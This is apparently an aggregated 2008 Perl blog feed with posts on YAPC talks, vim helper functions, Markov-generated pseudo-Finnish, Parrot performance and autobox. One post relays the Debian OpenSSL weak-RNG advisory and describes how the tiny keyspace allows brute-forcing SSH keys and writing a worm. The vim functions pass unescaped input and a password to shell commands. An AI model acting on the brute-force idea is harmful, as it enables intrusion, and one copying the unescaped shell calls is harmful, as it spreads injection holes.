Text::MicroMason (::SafeServerPage)
yusukebe "WebService::Simple" - to return cute photos of cats
ingy: vroom -vroom Vroom::Vroom / zhong shell
clkao "Prototype::Signatures" - how hard could it be? B::Scared. Hacks the parser. Faster than normal sub!
takesake "HTML Binary Hacks - GIF98a Polyglot" Detecting browser by how it parses HTML without JavaScript or CSS hacks. JavaScript in GIF, Perl in GIF
The band-aid itself is circular, about 1.5 cm in diameter. It is sealed between two pieces of paper, each about an inch square, that have been glued together along the four pairs of edges. There is a flap at one edge that you pull, and then you can peel the two glued-together pieces of paper apart to get the band-aid out.
As I peeled apart the two pieces of paper in the dark, there was a thin luminous greenish line running along the inside of the wrapper at the place the papers were being pulled away from each other. The line moved downward following the topmost point of contact between the papers as I pulled the papers apart. It was clearly visible in the dark.
I've never heard of anything like this; the closest I can think of is the thing about how wintergreen Life Savers glow in the dark when you crush them.
My best guess is that it's a static discharge, but I don't know. I don't have pictures of the phenomenon itself, and I'm not likely to be able to get any. But the band-aids look like this:
Have any of my Gentle Readers seen anything like this before? A cursory Internet search has revealed nothing of value.
I don't particularly like the way vim's grep works. It's slow, jumps to the first match (you can suppress this) and generally just doesn't behave the way I want it to behave. I want to search, automatically jump to the first match if only one file is found or get a list of files and choose one to edit. I tried egrep, but was getting strange "too many files" errors, so I switched to ack and everything magically worked (I've no idea why).
noremap <silent> <leader>g :call MyGrep("lib/")<cr>
noremap <silent> <leader>G :call MyGrep("lib/ t/ aggtests/ deps_patched/")<cr>
noremap <silent> <leader>f :call MyGrep("lib/", expand('<cword>'))<cr>
function! MyGrep(paths, ...)
let pattern = a:0 ? a:1 : input("Enter pattern to search for: ")
if !strlen(pattern)
return
endif
let command = 'ack "' . pattern . '" ' . a:paths .' -l'
let bufname = bufname("%")
let result = filter(split( system(command), "\n" ), 'v:val != "'.bufname.'"')
let lines = []
if !empty(result)
if 1 == len(result)
let file = 1
else
" grab all the filenames, skipping the current file
let lines = [ 'Choose a file to edit:' ]
\ + map(range(1, len(result)), 'v:val .": ". result[v:val - 1]')
let file = inputlist(lines)
end
if
\ ( file > 0 && len(result) > 1 && file < len(lines) )
\ ||
\ ( 1 == len(result) && 1 == file )
execute "edit +1 " . result[ file - 1 ]
execute "/\\v" . pattern
endif
else
echomsg("No files found matching pattern: " . pattern)
endif
endfunction
The main drawback is that vim and perl regular expressions aren't compatible (I don't have perl integration in this vim). The '\v' switch mitigates some of the pain, but I think a primitive regex transformation tool might alleviate some of the pain.
Update: Now attempts to skip the current file in the buffer. Not really needed, but when you have two files with the thing you're searching for and you're in one, it will automatically jump to the other. I've found this common enough that it seems an obvious use case.
Read more of this story at use Perl.
Read more of this story at use Perl.
A quick onigiri for breakfast and the largest YAPC so far begins, with 435 attendees.
Follow the conference on live.yapcasia.org.
Yesterday was the day before YAPC::Asia 2008 Tokyo and it was an evening of overflow talks. Which also happened to have free beer and weird snacks.
It started of with the Soozy Conference. It began with a talk on scaffold, which was really about thousands of lines of XML, flex and generating server-side Java based upon HTML.
Then there were a few lightning talks, about lift, a Scala web framework (Scala is the future), a geek magician with his playing card scanner beta, and yet another web application framework (it's too hard to write a WAF, so they spun out HTTP::Engine and HTTPx::Dispatcher). There was a quick presentation on HTTP::Engine (id:dropdb, "middleware is not a cool name") and a great Flash animation about Perl.
Then it was time for RejectConf, which talks about jQuery internals, higher-order JavaScript (wait, this is a Perl conference?) and a talk about Devel::DFire (something like DTrace for Perl).
An excellent beginning.
Of the various comments I received, perhaps the most interesting was from Ilmari Vacklin. ("Vacklin", huh? If my program had generated "Vacklin", the Finns would have been all over the error.) M. Vacklin pointed out that a number of words in my sample output violated the Finnish rules of vowel harmony.
(M. Vacklin also suggested that my article must have been inspired by this comic, but it wasn't. I venture to guess that the Internet is full of places that point out that you can manufacture pseudo-Finnish by stringing together a lot of k's and a's and t's; it's not that hard to figure out. Maybe this would be a good place to mention the word "saippuakauppias", the Finnish term for a soap-dealer, which was in the Guinness Book of World Records as the longest commonly-used palindromic word in any language.)
Anyway, back to vowel harmony. Vowel harmony is a phenomenon found in certain languages, including Finnish. These languages class vowels into two antithetical groups. Vowels from one group never appear in the same word as vowels from the other group. When one has a prefix or a suffix that normally has a group A vowel, and one wants to join it to a word with group B vowels, the vowel in the suffix changes to match. This happens a lot in Finnish, which has a zillion suffixes. In many languages, including Finnish, there is also a third group of vowels which are "neutral" and can be mixed with either group A or with group B.
Modern Korean does not have vowel harmony, mostly, but Middle Korean did have it, up until the early 16th century. The Korean alphabet was invented around 1443, and the notation for the vowels reflected the vowel harmony:

The first four vowels in this illustration, with the vertical lines, were incompatible with the second four vowels, the ones with the horizontal lines. The last two vowels were neutral, as was another one, not shown here, which was written as a single dot and which has since fallen out of use. Incidentally, vowel harmony is an unusual feature of languages, and its presence in Korean has led some people to suggest that it might be distantly related to Turkish.
The vowel harmony thing is interesting in this context for the following reason. My pseudo-Finnish was generated by a Markov process: each letter was selected at random so as to make the overall frequency of the output match that of real Finnish. Similarly, the overall frequency of two- and three-letter sequences in pseudo-Finnish should match that in real Finnish. Is this enough to generate plausible (although nonsensical) Finnish text? For English, we might say maybe. But for Finnish the answer is no, because this process does not respect the vowel harmony rules. The Markov process doesn't remember, by the time it gets to the end of a long word, whether it is generating a word in vowel category A or B, and so it doesn't know which vowels it whould be generating. It will inevitably generate words with moxed vowels, which is forbidden. This problem does not come up in the generation of pseudo-English.
None of that was what I was planning to write about, however. What I wanted to do was to present samples of pseudo-Finnish generated with various tunings of the Markov process.
The basic model is this: you choose a number N, say 2, and then you look at some input text. For each different sequence of N characters, you count how many times that sequence is followed by "a", how many times it is followed by "b", and so on.
Then you start generating text at random. You pick a sequence of N characters arbitrarily to start, and then you generate the next character according to the probabilities that you calculated. Then you look at the last N characters (the last N-1 from before, plus the new one) and repeat. You keep doing that until you get tired.
For example, suppose we have N=2. Then we have a big table whose keys are 2-character strings like "ab", and then associated with each such string, a table that looks something like this:
| r | 54.52 |
| a | 15.89 |
| i | 10.41 |
| o | 7.95 |
| l | 4.11 |
| e | 3.01 |
| u | 1.10 |
| space | 0.82 |
| : | 0.55 |
| t | 0.55 |
| , | 0.27 |
| . | 0.27 |
| b | 0.27 |
| s | 0.27 |
Whether to count capital letters as the same as lowercase, and what to do about punctuation and spaces and so forth, are up to the designer.
Here, as examples, are some samples of pseudo-English, generated with various N. The input text was the book of Genesis, which is not entirely typical. In each case, I deleted the initial N characters and the final partial word, cleaned up the capitalization by hand, and appended a final period.
I have prepared samples of pseudo-Finnish of various qualities. The input here was a bunch of text I copied out of Finnish Wikipedia. (Where else? If you need Finnish text in 1988, you get it from the Usenet fi.talk group; if you need Finnish text in 2008, you get it from Finnish Wikipedia.) I did a little bit of manual cleanup, as with the English, but not too much.
I must say that I found "yhdysvalmistämistammonit" rather far-fetched, even in Finnish. But then I discovered that "yhdeksänkymmenvuotiaaksi" and "yhdysvalloissakaan" are genuine, so who am I to judge?
The next monthly Parrot release will take place next Tuesday, 20 May 2008. In preparation for the release, we're holding yet another monthly Bug Day, all day Saturday 17 May. Parrot hackers, contributors, fans, and hangers-on will gather in #parrot on irc.perl.org to discuss proposed patches, verify and close bugs, and help potential new contributors download, configure, build, and understand Parrot and languages hosted in the Parrot repository. If you're interested in Parrot, have some free time, and want to get your hands a little bit dirty with code, please join us. You don't need to know how to program C or PIR or even Perl 5, but knowing how to download code from a public Subversion repository and build a C program will be very helpful.
Constantly I'll find myself working with DBIx::Class and I want to see the underlying table structure. So I exit my editor, fire up mysql, sob quietly, and type "show create table $some_table". Now I don't have to -- except for the sobbing part.
Make sure you have filetype plugin on in your .vimrc and in your .vim/ftplugin/perl.vim file add the following code (replacing the variables in the beginning of the function, of course):
noremap T :call ShowCreateTable(expand("<cword>"))<cr>
function! ShowCreateTable(class_segment)
" replace these values with whatever your system needs
let dbic_base = "My::Schema::"
let host = "localhost"
let port = 3306
let user = "someuser"
let pass = "somepass"
let db = "somedatabase"
let class = dbic_base . a:class_segment
let table = system("perl -M". class ." -e 'print ". class ."->table'")
let create = system(
\ "mysql -h".host.
\ " -P" .port.
\ " -u" .user.
\ " -p" .pass.
\ " " .db.
\ " -e 'show create table ".table."'"
\ )
echo substitute(create, "\\\\n", "\n", "g")
endfunction
Then, when I see stuff like this:
$schema->resultset('MasterBrand')->find_or_create({ ...
I just position my cursor on the MasterBrand word, type 'T' and it automatically shows the "create table" statement.
Of course, if you don't want to create a .vim/ftplugin/perl.vim file (you should, but you don't have to :), then you could drop the function in your .vimrc and add the following:
filetype plugin on
au! FileType perl :noremap T :call ShowCreateTable(expand("<cword>"))<cr>
After a lot of aggressive work improving our test suite performance, adding 50% more tests has tremendously slowed us down.
All tests successful.
Files=48, Tests=14025, 1386 wallclock secs ( 3.06 usr 0.46 sys + 1035.71 cusr 42.77 csys = 1082.00 CPU)
Result: PASS
Number of test programs: 48
Total runtime approximately 23 minutes 5 seconds
Ten slowest tests:
+---------+-----------------------------------+
| Time | Test |
+---------+-----------------------------------+
| 13m 25s | t/acceptance.t |
| 5m 36s | t/aggregate.t |
| 0m 36s | t/standards/use.t |
| 0m 24s | t/system/both/import/log/pager.t |
| 0m 20s | t/system/both/import/log/search.t |
| 0m 11s | t/system/both/import/log/log.t |
| 0m 11s | t/unit/db/migrations.t |
| 0m 11s | t/unit/fip/record-changes.t |
| 0m 10s | t/unit/piptest/pprove/testdb.t |
| 0m 9s | t/test_class_tests.t |
+---------+-----------------------------------+
(Note that the acceptance and aggregate tests both emcompass the vast majority of those 14000 tests and simple aggregation is no longer a win.)
Since we're running at roughly 10 tests a second, I started paying attention to where we can gain wins and it looks like XML::XPath is a likely candidate for performance improvements. In fact, the code has a number of areas where it could be improved substantially. It's not been updated in years and I've contacted Matt Sergeant about having a colleague take it over. This could also be an excellent opportunity to pay attention to its RT queue.
$ dprofpp
Total Elapsed Time = 35.55858 Seconds
User+System Time = 13.44858 Seconds
Exclusive Times
%Time ExclSec CumulS #Calls sec/call Csec/c Name
3.32 0.446 0.655 39692 0.0000 0.0000 <anon>:/home/poec01/trunk/deps/lib
/perl5//XML/XPath/XMLParser.pm:63
2.94 0.395 1.373 5544 0.0001 0.0002 XML::XPath::XMLParser::parse_start
2.35 0.316 0.385 20180 0.0000 0.0000 <anon>:/home/poec01/trunk/deps/lib
/perl5//XML/XPath/Node.pm:236
2.04 0.275 3.025 30768 0.0000 0.0001 <anon>:/opt/csw/lib/perl/site_perl
/XML/Parser.pm:187
1.84 0.248 1.229 19680 0.0000 0.0001 XML::XPath::XMLParser::parse_char
1.84 0.247 0.247 48278 0.0000 0.0000 Class::Accessor::Grouped::get_simp
le
1.83 0.246 0.598 20196 0.0000 0.0000 <anon>:/home/poec01/trunk/deps_pat
ched/lib/Test/XML/XPath.pm:67
1.80 0.242 0.337 19252 0.0000 0.0000 Class::Accessor::Grouped::get_inhe
rited
1.50 0.202 0.202 11760 0.0000 0.0000 XML::XPath::XMLParser::_namespace
1.42 0.191 1.113 11136 0.0000 0.0001 XML::XPath::Node::ElementImpl::DES
TROY
1.32 0.178 0.178 11200 0.0000 0.0000 XML::XPath::Node::ElementImpl::get
Attributes
1.28 0.172 0.418 1361 0.0001 0.0003 DBIx::Class::ResultSet::new
1.23 0.166 0.869 549 0.0003 0.0016 base::import
1.22 0.164 0.362 13872 0.0000 0.0000 XML::XPath::Node::ElementImpl::app
endChild
1.20 0.162 3.187 24 0.0068 0.1328 XML::Parser::Expat::ParseString
Just that list above shows that almost 16% of our time is spent in XML::XPath.
A few more minutes on the train and I have tag cloud added to this perl blog.
Appearantly I wrote this a long time ago as Ubuntu 8.04 has just came out and I am about to upgrade my notebook. Anyway as I on a train now and have nothing better to do than cleanin up old, half written posts I add this too. Better than throwing it away I think.
After my Dell notebook broke down I bought an HP nc6400 to work on and use during trainings It sais HP on the top of the notebook but next to the screen is sais Compaq nv6400. When will they make up their mind if they are called HP or Compaq?
Anyway the notebook looks very nice. I installed Ubuntu 6.10 on it from CD and as 7.04 beta just came out I decided to try that and upgraded vi the network upgrade. Everything went very well and most of the hardware I tried works well.
The main problem I encountered is that I am using a Samsung SyncMaster 731b external monitor (connected via the standard HP docking station I bought with the notebook) but I could not yet figure out how to configure the screen so can see the full display on either the internal screen or on the external.
The same goes with overhead projectors. I tried one during a Perl Mongers meeting and it was a disaster. The left 20% of the picture showed up on the right side of the screen.
This is the output of lspci
00:00.0 Host bridge: Intel Corporation Mobile 945GM/PM/GMS/940GML and 945GT Express Memory Controller Hub (rev 03) 00:02.0 VGA compatible controller: Intel Corporation Mobile 945GM/GMS/940GML Express Integrated Graphics Controller (rev 03) 00:02.1 Display controller: Intel Corporation Mobile 945GM/GMS/940GML Express Integrated Graphics Controller (rev 03) 00:1b.0 Audio device: Intel Corporation 82801G (ICH7 Family) High Definition Audio Controller (rev 01) 00:1c.0 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 1 (rev 01) 00:1c.1 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 2 (rev 01) 00:1c.3 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 4 (rev 01) 00:1d.0 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI #1 (rev 01) 00:1d.1 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI #2 (rev 01) 00:1d.2 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI #3 (rev 01) 00:1d.3 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI #4 (rev 01) 00:1d.7 USB Controller: Intel Corporation 82801G (ICH7 Family) USB2 EHCI Controller (rev 01) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev e1) 00:1f.0 ISA bridge: Intel Corporation 82801GBM (ICH7-M) LPC Interface Bridge (rev 01) 00:1f.2 IDE interface: Intel Corporation 82801GBM/GHM (ICH7 Family) Serial ATA Storage Controller IDE (rev 01) 02:06.0 CardBus bridge: Texas Instruments PCIxx12 Cardbus Controller 02:06.2 Mass storage controller: Texas Instruments 5-in-1 Multimedia Card Reader (SD/MMC/MS/MS PRO/xD) 02:06.3 Generic system peripheral [0805]: Texas Instruments PCIxx12 SDA Standard Compliant SD Host Controller 02:06.4 Communication controller: Texas Instruments PCIxx12 GemCore based SmartCard controller 08:00.0 Ethernet controller: Broadcom Corporation NetXtreme BCM5753M Gigabit Ethernet PCI Express (rev 21) 10:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG Network Connection (rev 02)
For the first time in the USA, I am going to teach a shortened version of my Test automation using Perl course. It will take place along the other master classes on June 19-20, 2008, the two days right after YAPC::NA.
Thanks to brian d foy, who organizes these master classes people can already register.
brian also told me that I should take care of all the promotion so I have already posted about it on use.perl.org and I have put a link about it on CPAN::Forum. Later I think I'll buy some advertiesments on Google as well.
To add more to the promotion I should also say that the is a quite a rare opportunity as AFAIK there is noone else teaching such course and I don't know when am I going to be able to teach it again in the US. In addition the idea behind the master classes is that you can learn this stuff at a fraction of the normal cost of the courses. They are given at such price partially as a promotion to YAPC itself.
I am more and more getting into these tagging business. I am using del.icio.us to manage my bookmarks and I should further improve the tags on CPAN::Fourm as well.
So I thought it might be time to add tags to the blog as well and as I am impulsive in this stuff I added the code to display tags. It really only took about 40 minutes and half of it was on my train ride from Tel Aviv to Modiin.
Today's Rakudo-building speedup is 27.79%.
(Okay, the other slow part of Rakudo builds 17.59% faster. Still.)
The profile showed that string allocation was a hotspot in the benchmark. In particular, the part of Parrot which allocates memory out of arenas spent a lot of time performing garbage collection. Every time you can avoid either allocating unnecessary memory or running a full garbage collection, you can improve performance.
Parrot r27484 adds one line of code (and one line of comment).
Every time mem_allocate() successfully allocates a new block, it increments a counter. Whenever the garbage collector performs a full run, it resets that counter to zero.
This patch performs a garbage collection run from mem_allocate() only if that counter is non-zero. That is, if the garbage collector has already run, it's already found as much free arena memory as possible. (This is not memory for PMCs or STRING headers; this is buffer memory.) Running the GC again won't find any more free buffer memory. In that case, skipping the GC run and allocating more memory from the OS gives the performance improvement.
I should note that my comments about avoiding memory allocation apply in the general case. Parrot's current GC has some limitations. The biggest is that it stops the world to mark and sweep everything. The new GC Andrew Whitworth will implement as part of the Google Summer of Code will fix that. As well, we have some ideas to improve the implementation such that the GC will become even less expensive now. Then we'll see algorithmic improvements that make even this 27.79% optimization seem small.
|
Order Symbols, Signals, and Noise with kickback no kickback |
But around that time the Internet was just beginning to get into full swing. The Finnish government was investing a lot of money in networking infrastructure, and a lot of people in Finland were starting to appear on the Internet.
I have a funny story about that: Around the same time, a colleague named Marc Edgar approached me in the computer lab to ask if I knew of any Internet-based medium he could use to chat with his friend at the University of Oulu. I thought at first that he was putting me on (and maybe he was) because in 1989 the University of Oulu was just about the only place in the world where a large number of people were accessible via internet chat, IRC having been invented there the previous autumn.
A new set of Finnish-language newsgroups had recently appeared on Usenet, and people posted to them in Finnish. So I had access to an unlimited supply of computer-readable Finnish text, something which would have been unthinkable a few years before, and I could do the experiment in Finnish.
I wrote up the program, which is not at all difficult,
gathered Finnish news articles, and produced the following sample:
Uttavalon estaa ain pahalukselle? Min omatunu selle menneet hy, toista. Palveljen alh tkö an välin oli ei alkohol pisten jol elenin. Että, ille, ittavaikki oli nim tor taisuuristä usein an sie a in sittä asia krista sillo si mien loinullun, herror os; riitä heitä suurinteen palve in kuk usemma. Tomalle, äs nto tai sattia yksin taisiä isiäk isuuri illää hetorista. Varsi kaikenlaineet ja pu distoja paikelmai en tulissa sai itsi mielim ssän jon sn ässäksi; yksen kos oihin! Jehovat oli kukahdol ten on teistä vak kkiasian aa itse ee eik tse sani olin mutta todistanut t llisivat oisessa sittä on raaj a vaisen opinen. Ihmisillee stajan opea tajat ja jumalang, sitten per sa ollut aantutta että voinen opeten. Ettuj, jon käs iv telijoitalikantaminun hä seen jälki yl nilla, kkeen, vaaraajil tuneitteistamaan same?
In those days, the world was 7-bit, and Finnish text was posted in a Finnish national variant of ASCII that caused words like "tkö an välin" to look like "tk| an v{lin". The presence of the curly braces heightened the apparent similarity, because that was all you could see at first glance.
At the time I was pleased, but now I think I see some defects. There are some vowelless words, such as "sn" and "t", which I think doesn't happen in Finnish. Some other words look defective: "ssän" and "kkeen", for example. Also, my input sample wasn't big enough, so once the program generated "alk" it was stuck doing the rest of "alkohol". Still, I think this could pass for Finnish if the reader wasn't paying much attention. I was satisfied with the results of the experiment, and was willing to believe that randomly-contructed English really did look enough like English to fool a non-English-speaking observer.
[ Addendum 20080514: There is a followup to this article. ]
via Reddit, this Debian Security announcement:
‘Luciano Bello discovered that the random number generator in Debian’s openssl package is predictable. This is caused by an incorrect Debian-specific change to the openssl package (CVE-2008-0166). As a result, cryptographic key material may be guessable.
It is strongly recommended that all cryptographic key material which has been generated by OpenSSL versions starting with 0.9.8c-1 on Debian systems (ie since 2006! –jm) is recreated from scratch. Furthermore, all DSA keys ever used on affected Debian systems for signing or authentication purposes should be considered compromised; the Digital Signature Algorithm relies on a secret random value used during signature generation.’
and, of course, here’s the Ubuntu Security Notice for the hole:
Who is affected
Systems which are running any of the following releases:
- Ubuntu 7.04 (Feisty)
- Ubuntu 7.10 (Gutsy)
- Ubuntu 8.04 LTS (Hardy)
- Ubuntu “Intrepid Ibex” (development): libssl <= 0.9.8g-8
- Debian 4.0 (etch) (see corresponding Debian security advisory)
and have openssh-server installed or have been used to create an OpenSSH key or X.509 (SSL) certificate. All OpenSSH and X.509 keys generated on such systems must be considered untrustworthy, regardless of the system on which they are used, even after the update has been applied. This includes the automatically generated host keys used by OpenSSH, which are the basis for its server spoofing and man-in-the-middle protection.
It was apparently caused by this incorrect “fix” applied by the Debian maintainers to their package. One wonders why that fix never made it upstream.
Bad news….
Update: Ben Laurie tears into Debian for this:
What can we learn from this? Firstly, vendors should not be fixing problems (or, really, anything) in open source packages by patching them locally - they should contribute their patches upstream to the package maintainers. Had Debian done this in this case, we (the OpenSSL Team) would have fallen about laughing, and once we had got our breath back, told them what a terrible idea this was. But no, it seems that every vendor wants to “add value” by getting in between the user of the software and its author.
+1!
For what it’s worth, we in Apache SpamAssassin work closely with our Debian packaging team, tracking the debbugs traffic for the spamassassin package, and one of the Debian packagers is even on the SpamAssassin PMC. So that’s one way to reduce the risk of upstream-vs-package fork bugs like this, since we’d have spotted that change going in, and nixed it before it caused this failure.
Here’s a question: should the OpenSSL dev team have monitored the bug traffic for Debian and the other packagers? Do upstream developers have a duty to monitor downstream changes too?
This comment puts it a little strongly, but is generally on the money in this regard:
the important part for OpenSSL is to find a way to escape the blame for their fuck-up. They failed to publish the correct contact address for such important questions regarding OpenSSL. Branden (another commenter –jm) noted that the mail address mentioned by Ben is not documented anywhere. It is OpenSSL’s responsibility that they allowed the misuse of openssl-dev for offtopic questions and then silently moving the dev stuff to a secret other list nobody outside OpenSSL knew about.
I’m sure Debian is willing to take their fair share of the blame if OpenSSL finally admits that their mistake played a major role here as well. After all the Debian maintainer might have misrepresented the nature of his plans, but he gave warning signs and said he was unsure. But as it appears now all the people who might have noticed secretly left openssl-dev, the documented place for that kind of questions. This is hardly the fault of the maintainer.
Update 2: this Reddit comment explains the hole in good detail:
Valgrind was warning about unitialized data in the buffer passed into ssleay_rand_bytes, which was causing all kinds of problems using Valgrind. Now, instead of just fixing that one use, for some reason, the Debian maintainers decided to also comment out the entropy mixed in from the buffer passed into ssleay_rand_add. This is the very data that is supposed to be used to see the random number generator; this is the actual data that is being used to provide real randomness as a seed for the pseudo-random number generator. This means that pretty much all data generated by the random number generator from that point forward is trivially predictable. I have no idea why this line was commented out; perhaps someone, somewhere, was calling it with uninitialized data, though all of the uses I’ve found were with initialized data taken from an appropriate entropy pool.
So, any data generated by the pseudo-random number generator since this patch should be considered suspect. This includes any private keys generated using OpenSSH on affected Debian systems. It also includes the symmetric keys that are actually used for the bulk of the encryption.
A pretty major fuck-up, all told.
Update 3: Here’s a how-to page on wiki.debian.org put together by the folks from the #debian IRC channel. It has how-to information on testing your keys for vulnerability using a script called ‘dowkd.pl’, details of exactly what packages and keys are vulnerable, and instructions on how to regenerate keys in each of the (many) affected apps.
It notes this about Apache2 SSL keys:
According to folks in #debian-security, if you have generated an SSL key (normally the step just prior to generating the CSR, and then sending it off to your SSL certificate provider), then the certificate should be considered vulnerable.
So, bad news — SSL keys will need to be regenerated. Add ‘costly’ to the list of downsides. (Yet another update: this hasn’t turned out quite that badly after all — many CAs are now offering free reissuance of affected certs.)
Looking at ‘dowkd.pl’, it gets even worse for ssh users. It appears the OpenSSH packages on affected Debian systems could only generate 1 of only 262148 distinct keypairs. Obviously, this is trivial to brute-force. With a little precomputation (which would only take 14 hours on a single desktop!), an attacker can generate all of those keypairs, and write a pretty competent SSH worm. :(
Update: voila, precomputed keypairs, and figures on the viability of remote brute-forcing the keyspace in 11 minutes.
Read more of this story at use Perl.
The autobox pragma first showed up a few years ago. It lets you do something
like this:
use autobox;
[ qw(wonderful is very autobox) ]
->sort->map(sub { ucfirst })->join(q{ })->print;
...to print: Autobox Is Very Wonderful
At first, it was pretty neat, but it required patches to perl. By 2005, it had been rewritten to require no patch, but was still pretty scary and experimental, at least to me. Over the last few years, I've looked over toward autobox a few times, itching to use it all over the place, but never quite willing to do so because of a few significant limitations.
First of all, this didn't work: $array_ref->$method_name
Method names needed to be literals, meaning that it was more difficult to pick a method at runtime with autoboxed values than with standard objects.
More importantly, this didn't work: @array->method
This was important because this wouldn't work either: \@array->method
The precedence of -> is higher than \, so it took a reference to the result
of @array->method, which was equivalent (as I recall) to:
(my $x = @array)->method
...so, not very useful.
Over the last few weeks, these two bugs have been addressed. The only thing that I'm still not entirely sold on is that this does not do the right thing:
my @new = grep { ... } @old->sort;
Sure, I could write @old->sort->flatten, but that's not the point. I
want the result of sort to be usable as a flat list, the same was @old was.
Coding that would require knowing that the invocant of the autoboxing class's
method was not a reference to begin with, and that information isn't available.
Still, it's not bad at all. This morning I released a new Moose::Autobox,
adding a flatten method to both Array and Hash. I think I see a lot of
autoboxing in my future!
Read more of this story at use Perl.
Read more of this story at use Perl.
Adam Scheinberg makes an argument for PHP, which is fine in itself, but misses a key point about those of us who are horrified by PHP as a language.
I argue than everyone posting about how PHP is a bad language as a whole is an idiot. Every single one. Each is a foolish, arrogant, nerd sheep who can't think for themselves.
Scheinberg acknowledges some of the problems with PHP, but then says that PHP is good because you can run it all over the place, and many big sites serve lots of traffic with it, and boy isn't mod_perl a pain in the ass to install? And sometimes PHP is just a great tool for the job at hand:
[t]hose who would forsake "the right tool for the job at hand" shouldn't be trusted even to water your plants, because they are obviously nitwits. If you can't concede that PHP can be the right tool some of the time for some situations, you shouldn't be trusted to code or make adult decisions.
Can't disagree with that at all, Adam. It's all a matter of using the right tool for the job. Sometimes that right tool for the job just happens to be a crappy language.
So, as a foolish, arrogant, idiot, nerd sheep, we can agree that:
Nonetheless, PHP is still an awful language, and in my decision making process, the pain & anguish I go through to use it means it rarely winds up as the right tool for the job.
Yesterday I sent out 353 mail messages to the PM group leaders using the contact details in the PM master XML document.
Almost instantly, I got 58 bounce messages back. That's an error rate approaching 1 in 6. A sixth of the contact addresses that we are publishing on pm.org are invalid. What kind of an impression does that give to people trying to contact a PM group? And that's after I posted messages a fortnight ago (on use.perl and on Perl Monks) asking leaders to check their contact details.
Oh and I got one reply from a challenge-response system. There's a special circle of hell reserved for people who use challenge-response systems. Especially on email addresses that are published as contact addresses.
If there's anyone reading this who should have received a mail but didn't, can you please contact me at census[at]pm.org so we can fix the problem. You might also check your contact details at http://pm.org/groups/ and email any corrections to support[at]pm.org.
Now I remember why it's been three years since the last census. It takes that long for me to forget what a massive headache it all is :-)
p.s. Oh, but before I forget. A big thank you to the over one hundred group leaders who have already responded.
Steve Yegge transcribed an excellent talk he gave on dynamic languages. It's incredibly thought-provoking and worth reading all the way through. And for the pseudo-obligatory Perl content, here is one of his comments on marketing:
I mean, like, Perl was a marketing success, right? But it didn't have Sun or Microsoft or somebody hyping it. It had, you know, the guy in the cube next to you saying "Hey, check out this Perl. I know you're using Awk, but Perl's, like, weirder!"
And for the Big Bucket of Fail, a someone named "dibblego" had this to say about Yegge's pre-emptive apology regarding some of his colorful comments:
Steve,
Some of these people are more likely to be offended by your compulsion to pass severely under-qualified comment on the topic; something you have done more than once before. The offense comes about because it is almost deliberately misleading to others who might have the desire to learn and are not in a position to know any better and may mistake your pseudo-scientific nonsense with warranted factual claims.
I say "almost deliberate" because I am more inclined to believe your desire to continue doing this is a result of your ignorance rather than malice.
Here's a tip for you kids: "dibblego" might be right, but we'll never know since he never bothers to back up his assertions. Hell, if you're going to be rude, at least be rude with some meat on, will ya?
On another note, Yegge commented that many issues with Java generics require relatively newer programmers to have at least an implicit understanding of covariance and contravariance. These deal with the substitutability of return types and parameters in OO systems and, and, and ...
Boom!
Here's a tip for language designers: if an oft-used feature of your language requires a deep understanding of comp-sci/math, programmers are going to get it wrong. Here be dragons. It's OK to allow things to require advanced concepts, but not for common code that you hope to spread to the masses.
For extra credit, try to find a clear, concise explanation of covariance and contravariance (and invariance, while you're at it) that your typical Jack in the Box programmer is going to be willing to read, much less understand.
On a side note, I still think it would be good to have a "Just Enough Theory" book for programmers that explains the basics they need to know to prevent the "beat them to death with Knuth" fantasies. I don't expect a new programmer to understand why restricting first order predicate logic to horn clauses is considered (by some) to be a weakness, but they had better know about loose coupling and cohesive functions.
This site offers a nifty utility for dealing with those annoying sites which offer only partial text content in their RSS and Atom feeds.
Given an RSS or Atom feed’s URL, the CGI will iterate through the posts in the feed, scrape the full text of each post from its HTML page, and re-generate a new RSS feed containing the full text.
The one thing it’s missing is a one-click bookmarklet version. So here it is:
Drag that to your bookmarks menu, and next time you’re looking at a partial-text feed, click the bookmark to transform the viewed page into the full-text version. Enjoy!
Quite a while ago, I suggested to ABE.pm that we should get together and do some group hacking. When someone said, "HACKATHON??" I said, "Good grief, no!" I just wanted to do some messing about and have fun, without worrying about goals or accomplishments. Also, "hackathon" sounds like the hacking equivalent of running 26.2 miles: gruelling. I wanted to make sure it was clear that the point was to hang out, and that hacking was just the entertainment.
At any rate, since I knew we had our technical venue booked for this past week and I knew that I didn't have any good talks prepared and I knew I wasn't going to get a guest speaker with no notice, I declared that it was time for hacking. For a project, I decided we'd play with a game I was working on earlier in the year. It still has oodles of things that need to be done, ranging from the trivial to the really complex. It uses lots of fun new stuff, and it's just sort of a fun project in general.
I installed Debian (sid) on a virtual machine on my Mac, installed all the prerequisites, git, and some other essentials, and briefly refamiliarized myself with the code we'd be working on. Unfortunately, not all of this happened before the event began -- but that's fine. We still had a good time. A few bugs got fixed, some new ones got revealed, and I think everyone had a pretty good time.
Next time, we should be able to get started much faster. I've made a lot of improvements to the virt's setup based on our experiences that night, and I've learned a few good things about git and some other involved tools.
I'm itching to have another hacking session, but I'll have to wait for July. Our next meeting, in June, is a social meeting. While I'm very tempted to declare that we'll be doing a tech meeting again, that would mean that we would not go to McGrady's for hot wings and a Fahy burger. I don't think I can get behind that kind of trade-off.
In case anyone has been thinking, "Gosh, I haven't seen anything from rjbs lately," the reason is ridiculous. It's not that I've been busy (but I have) or lazy (but I am). It's that I've been stupid.
When I relocated some of my hosted services to Linode (who, by the way, are awesome), I decided that running Rubric as a CGI script was insane. It's always been slow and inefficient, and I knew I could make it much, much faster by making the process persistent. On my previous host, where TIMS also ran, I saw how much faster Rubric could be under mod_perl, but I had some minor problems and wasn't interested in futzing with Apache, which I vaguely dislike.
On my new host, I switched everything to lighttpd, and I figured I'd use FastCGI. I thought this would be trivial, but the state of the art for moving CGI things to FastCGI seemed to be lousy. Someone finally pointed me at Stevan Little's fantastic FCGI::Engine. It did exactly what I wanted, making Rubric work with no code changes at all... or so I thought.
First, query parameters stopped changing. The first query to hit the daemon
